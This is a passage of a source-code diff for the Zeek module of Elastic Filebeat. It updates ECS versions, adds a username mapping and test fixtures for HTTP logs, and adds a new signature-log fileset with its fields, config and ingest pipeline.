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" } diff --git a/x-pack/filebeat/module/zeek/files/config/files.yml b/x-pack/filebeat/module/zeek/files/config/files.yml index af6fdedb326f..19dfddb9bf5a 100644 --- a/x-pack/filebeat/module/zeek/files/config/files.yml +++ b/x-pack/filebeat/module/zeek/files/config/files.yml @@ -42,4 +42,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/ftp/config/ftp.yml b/x-pack/filebeat/module/zeek/ftp/config/ftp.yml index db39c7596370..6acba2ed0c8d 100644 --- a/x-pack/filebeat/module/zeek/ftp/config/ftp.yml +++ b/x-pack/filebeat/module/zeek/ftp/config/ftp.yml @@ -86,4 +86,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/http/config/http.yml b/x-pack/filebeat/module/zeek/http/config/http.yml index d44f361b8af1..25bdbf709d1c 100644 --- a/x-pack/filebeat/module/zeek/http/config/http.yml +++ b/x-pack/filebeat/module/zeek/http/config/http.yml @@ -76,6 +76,7 @@ processors: - {from: "destination.address", to: "destination.ip", type: "ip"} - {from: "destination.port", to: "url.port"} - {from: "http.request.method", to: "event.action"} + - {from: "url.username", to: "user.name"} ignore_missing: true fail_on_error: false - add_fields: @@ -93,4 +94,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/http/test/http-json.log b/x-pack/filebeat/module/zeek/http/test/http-json.log index 733495725a32..82b680f7275d 100644 --- a/x-pack/filebeat/module/zeek/http/test/http-json.log +++ b/x-pack/filebeat/module/zeek/http/test/http-json.log @@ -1,2 +1,2 @@ -{"ts":1547687130.172944,"uid":"CCNp8v1SNzY7v9d1Ih","id.orig_h":"10.178.98.102","id.orig_p":62995,"id.resp_h":"17.253.5.203","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.apple.com","uri":"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=","version":"1.1","user_agent":"com.apple.trustd/2.0","request_body_len":0,"response_body_len":3735,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F5zuip1tSwASjNAHy7"],"resp_mime_types":["application/ocsp-response"]} -{"ts":1547707019.757479,"uid":"CMnIaR2V8VXyu7EPs","id.orig_h":"10.20.8.197","id.orig_p":35684,"id.resp_h":"34.206.130.40","id.resp_p":80,"trans_depth":1,"method":"GET","host":"httpbin.org","uri":"/ip","version":"1.1","user_agent":"curl/7.58.0","request_body_len":0,"response_body_len":32,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FwGPlr1GcKUWWdkXoi"],"resp_mime_types":["text/json"]} \ No newline at end of file +{"ts":1547687130.172944,"uid":"CCNp8v1SNzY7v9d1Ih","id.orig_h":"10.178.98.102","id.orig_p":62995,"id.resp_h":"17.253.5.203","username":"user","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.apple.com","uri":"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=","version":"1.1","user_agent":"com.apple.trustd/2.0","request_body_len":0,"response_body_len":3735,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F5zuip1tSwASjNAHy7"],"resp_mime_types":["application/ocsp-response"]} +{"ts":1547707019.757479,"uid":"CMnIaR2V8VXyu7EPs","id.orig_h":"10.20.8.197","id.orig_p":35684,"id.resp_h":"34.206.130.40","id.resp_p":80,"trans_depth":1,"method":"GET","host":"httpbin.org","uri":"/ip","version":"1.1","user_agent":"curl/7.58.0","request_body_len":0,"response_body_len":32,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FwGPlr1GcKUWWdkXoi"],"resp_mime_types":["text/json"]} diff --git a/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json b/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json index 200950e922a4..0b101cda6e1c 100644 --- a/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json +++ b/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json @@ -43,6 +43,9 @@ "10.178.98.102", "17.253.5.203" ], + "related.user": [ + "user" + ], "service.type": "zeek", "source.address": "10.178.98.102", "source.ip": "10.178.98.102", @@ -53,6 +56,8 @@ "url.domain": "ocsp.apple.com", "url.original": "/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=", "url.port": 80, + "url.username": "user", + "user.name": "user", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "com.apple.trustd/2.0", @@ -66,5 +71,74 @@ "zeek.http.tags": [], "zeek.http.trans_depth": 1, "zeek.session_id": "CCNp8v1SNzY7v9d1Ih" + }, + { + "@timestamp": "2019-01-17T06:36:59.757Z", + "destination.address": "34.206.130.40", + "destination.as.number": 14618, + "destination.as.organization.name": "Amazon.com, Inc.", + "destination.geo.city_name": "Ashburn", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 39.0481, + "destination.geo.location.lon": -77.4728, + "destination.geo.region_iso_code": "US-VA", + "destination.geo.region_name": "Virginia", + "destination.ip": "34.206.130.40", + "destination.port": 80, + "event.action": "get", + "event.category": [ + "network", + "web" + ], + "event.dataset": "zeek.http", + "event.id": "CMnIaR2V8VXyu7EPs", + "event.kind": "event", + "event.module": "zeek", + "event.outcome": "success", + "event.type": [ + "connection", + "info", + "protocol" + ], + "fileset.name": "http", + "http.request.body.bytes": 0, + "http.request.method": "GET", + "http.response.body.bytes": 32, + "http.response.status_code": 200, + "http.version": "1.1", + "input.type": "log", + "log.offset": 574, + "network.community_id": "1:Ol0Btm49e1mxnu/BXm1GM8w5ixY=", + "network.transport": "tcp", + "related.ip": [ + "10.20.8.197", + "34.206.130.40" + ], + "service.type": "zeek", + "source.address": "10.20.8.197", + "source.ip": "10.20.8.197", + "source.port": 35684, + "tags": [ + "zeek.http" + ], + "url.domain": "httpbin.org", + "url.original": "/ip", + "url.port": 80, + "user_agent.device.name": "Other", + "user_agent.name": "curl", + "user_agent.original": "curl/7.58.0", + "user_agent.version": "7.58.0", + "zeek.http.resp_fuids": [ + "FwGPlr1GcKUWWdkXoi" + ], + "zeek.http.resp_mime_types": [ + "text/json" + ], + "zeek.http.status_msg": "OK", + "zeek.http.tags": [], + "zeek.http.trans_depth": 1, + "zeek.session_id": "CMnIaR2V8VXyu7EPs" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/zeek/intel/config/intel.yml b/x-pack/filebeat/module/zeek/intel/config/intel.yml index 15fa51970d25..d48dec70d0e5 100644 --- a/x-pack/filebeat/module/zeek/intel/config/intel.yml +++ b/x-pack/filebeat/module/zeek/intel/config/intel.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/irc/config/irc.yml b/x-pack/filebeat/module/zeek/irc/config/irc.yml index cfc251d86161..58e1d861b13f 100644 --- a/x-pack/filebeat/module/zeek/irc/config/irc.yml +++ b/x-pack/filebeat/module/zeek/irc/config/irc.yml @@ -72,4 +72,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml b/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml index 40ec169b7b12..6035aa9fba29 100644 --- a/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml +++ b/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml @@ -104,4 +104,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/modbus/config/modbus.yml b/x-pack/filebeat/module/zeek/modbus/config/modbus.yml index c1a4e8980b60..759dfc78536c 100644 --- a/x-pack/filebeat/module/zeek/modbus/config/modbus.yml +++ b/x-pack/filebeat/module/zeek/modbus/config/modbus.yml @@ -73,4 +73,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/mysql/config/mysql.yml b/x-pack/filebeat/module/zeek/mysql/config/mysql.yml index ebd1675c36ce..b3f5d82d4896 100644 --- a/x-pack/filebeat/module/zeek/mysql/config/mysql.yml +++ b/x-pack/filebeat/module/zeek/mysql/config/mysql.yml @@ -72,4 +72,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/mysql/ingest/pipeline.yml b/x-pack/filebeat/module/zeek/mysql/ingest/pipeline.yml index ce2de3535495..d5552af6d29f 100644 --- a/x-pack/filebeat/module/zeek/mysql/ingest/pipeline.yml +++ b/x-pack/filebeat/module/zeek/mysql/ingest/pipeline.yml @@ -80,6 +80,10 @@ processors: field: event.type value: end if: "ctx?.zeek?.mysql?.cmd != null && ctx.zeek.mysql.cmd == 'connect_out'" +- append: + field: event.category + value: session + if: "ctx?.zeek?.mysql?.cmd != null && (ctx.zeek.mysql.cmd == 'connect' || ctx.zeek.mysql.cmd == 'connect_out')" on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/zeek/notice/config/notice.yml b/x-pack/filebeat/module/zeek/notice/config/notice.yml index 8d5fd59ecda4..4b09b7bc41f7 100644 --- a/x-pack/filebeat/module/zeek/notice/config/notice.yml +++ b/x-pack/filebeat/module/zeek/notice/config/notice.yml @@ -104,4 +104,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml b/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml index 5cbc5f405144..bcdf04d899f0 100644 --- a/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml +++ b/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml @@ -86,4 +86,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml b/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml index 7094312427d9..d929f70633f6 100644 --- a/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml +++ b/x-pack/filebeat/module/zeek/ocsp/config/ocsp.yml @@ -64,4 +64,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/pe/config/pe.yml b/x-pack/filebeat/module/zeek/pe/config/pe.yml index b0bc5a71b432..34b81b461171 100644 --- a/x-pack/filebeat/module/zeek/pe/config/pe.yml +++ b/x-pack/filebeat/module/zeek/pe/config/pe.yml @@ -33,4 +33,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/radius/config/radius.yml b/x-pack/filebeat/module/zeek/radius/config/radius.yml index 87eb92ff92d8..0779807c8fee 100644 --- a/x-pack/filebeat/module/zeek/radius/config/radius.yml +++ b/x-pack/filebeat/module/zeek/radius/config/radius.yml @@ -58,4 +58,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/rdp/config/rdp.yml b/x-pack/filebeat/module/zeek/rdp/config/rdp.yml index 27757d6279f7..f29a099da6bf 100644 --- a/x-pack/filebeat/module/zeek/rdp/config/rdp.yml +++ b/x-pack/filebeat/module/zeek/rdp/config/rdp.yml @@ -88,4 +88,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/rfb/config/rfb.yml b/x-pack/filebeat/module/zeek/rfb/config/rfb.yml index b518662dcceb..0f974ac07d70 100644 --- a/x-pack/filebeat/module/zeek/rfb/config/rfb.yml +++ b/x-pack/filebeat/module/zeek/rfb/config/rfb.yml @@ -73,4 +73,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/zeek/signature/_meta/fields.yml b/x-pack/filebeat/module/zeek/signature/_meta/fields.yml new file mode 100644 index 000000000000..7637ddd532bd --- /dev/null +++ b/x-pack/filebeat/module/zeek/signature/_meta/fields.yml @@ -0,0 +1,35 @@ +- name: signature + type: group + default_field: false + description: > + Fields exported by the Zeek Signature log. + fields: + - name: note + type: keyword + description: > + Notice associated with signature event. + + - name: sig_id + type: keyword + description: > + The name of the signature that matched. + + - name: event_msg + type: keyword + description: > + A more descriptive message of the signature-matching event. + + - name: sub_msg + type: keyword + description: > + Extracted payload data or extra message. + + - name: sig_count + type: integer + description: > + Number of sigs, usually from summary count. + + - name: host_count + type: integer + description: > + Number of hosts, from a summary count. diff --git a/x-pack/filebeat/module/zeek/signature/config/signature.yml b/x-pack/filebeat/module/zeek/signature/config/signature.yml new file mode 100644 index 000000000000..e6bef4d1a9da --- /dev/null +++ b/x-pack/filebeat/module/zeek/signature/config/signature.yml @@ -0,0 +1,50 @@ +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] +tags: {{.tags | tojson}} +publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} + +processors: + - rename: + fields: + - {from: message, to: event.original} + - decode_json_fields: + fields: [event.original] + target: zeek.signature + - convert: + ignore_missing: true + fields: + - {from: zeek.signature.src_addr, to: source.address} + - {from: zeek.signature.src_addr, to: source.ip, type: ip} + - {from: zeek.signature.src_port, to: source.port, type: long} + - {from: zeek.signature.dst_addr, to: destination.address} + - {from: zeek.signature.dst_addr, to: destination.ip, type: ip} + - {from: zeek.signature.dst_port, to: destination.port, type: long} + - rename: + ignore_missing: true + fields: + - from: zeek.signature.uid + to: zeek.session_id + - from: zeek.signature.sig_id + to: rule.id + - from: zeek.signature.event_msg + to: rule.description + - drop_fields: + ignore_missing: true + fields: + - zeek.signature.src_addr + - zeek.signature.src_port + - zeek.signature.dst_addr + - zeek.signature.dst_port + - add_fields: + target: event + fields: + kind: alert + - community_id: + - add_fields: + target: '' + fields: + ecs.version: 1.7.0 diff --git a/x-pack/filebeat/module/zeek/signature/ingest/pipeline.yml b/x-pack/filebeat/module/zeek/signature/ingest/pipeline.yml new file mode 100644 index 000000000000..539ea5d79121 --- /dev/null +++ b/x-pack/filebeat/module/zeek/signature/ingest/pipeline.yml @@ -0,0 +1,89 @@ +--- +description: Pipeline for normalizing Zeek signature.log. +processors: + - set: + field: event.ingested + value: '{{_ingest.timestamp}}' + - set: + field: event.created + value: '{{@timestamp}}' + - date: + field: zeek.signature.ts + formats: + - UNIX + - remove: + field: zeek.signature.ts + # IP Geolocation Lookup + - geoip: + if: ctx.source?.geo == null + field: source.ip + target_field: source.geo + ignore_missing: true + properties: + - city_name + - continent_name + - country_iso_code + - country_name + - location + - region_iso_code + - region_name + - geoip: + if: ctx.destination?.geo == null + field: destination.ip + target_field: destination.geo + ignore_missing: true + properties: + - city_name + - continent_name + - country_iso_code + - country_name + - location + - region_iso_code + - region_name + + # IP Autonomous System (AS) Lookup + - geoip: + database_file: GeoLite2-ASN.mmdb + field: source.ip + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true + - geoip: + database_file: GeoLite2-ASN.mmdb + field: destination.ip + target_field: destination.as + properties: + - asn + - organization_name + ignore_missing: true + - rename: + field: source.as.asn + target_field: source.as.number + ignore_missing: true + - rename: + field: source.as.organization_name + target_field: source.as.organization.name + ignore_missing: true + - rename: + field: destination.as.asn + target_field: destination.as.number + ignore_missing: true + - rename: + field: destination.as.organization_name + target_field: destination.as.organization.name + ignore_missing: true + - append: + field: "related.ip" + value: "{{source.ip}}" + if: "ctx?.source?.ip != null" + - append: + field: "related.ip" + value: "{{destination.ip}}" + if: "ctx?.destination?.ip != null" + +on_failure: + - set: + field: error.message + value: "{{ _ingest.on_failure_message }}" diff --git a/x-pack/filebeat/module/zeek/signature/manifest.yml b/x-pack/filebeat/module/zeek/signature/manifest.yml new file mode 100644 index 000000000000..e0d005622d0a --- /dev/null +++ b/x-pack/filebeat/module/zeek/signature/manifest.yml @@ -0,0 +1,19 @@ +module_version: 1.0 + +var: + - name: paths + default: + - /var/log/bro/current/signatures.log + os.linux: + 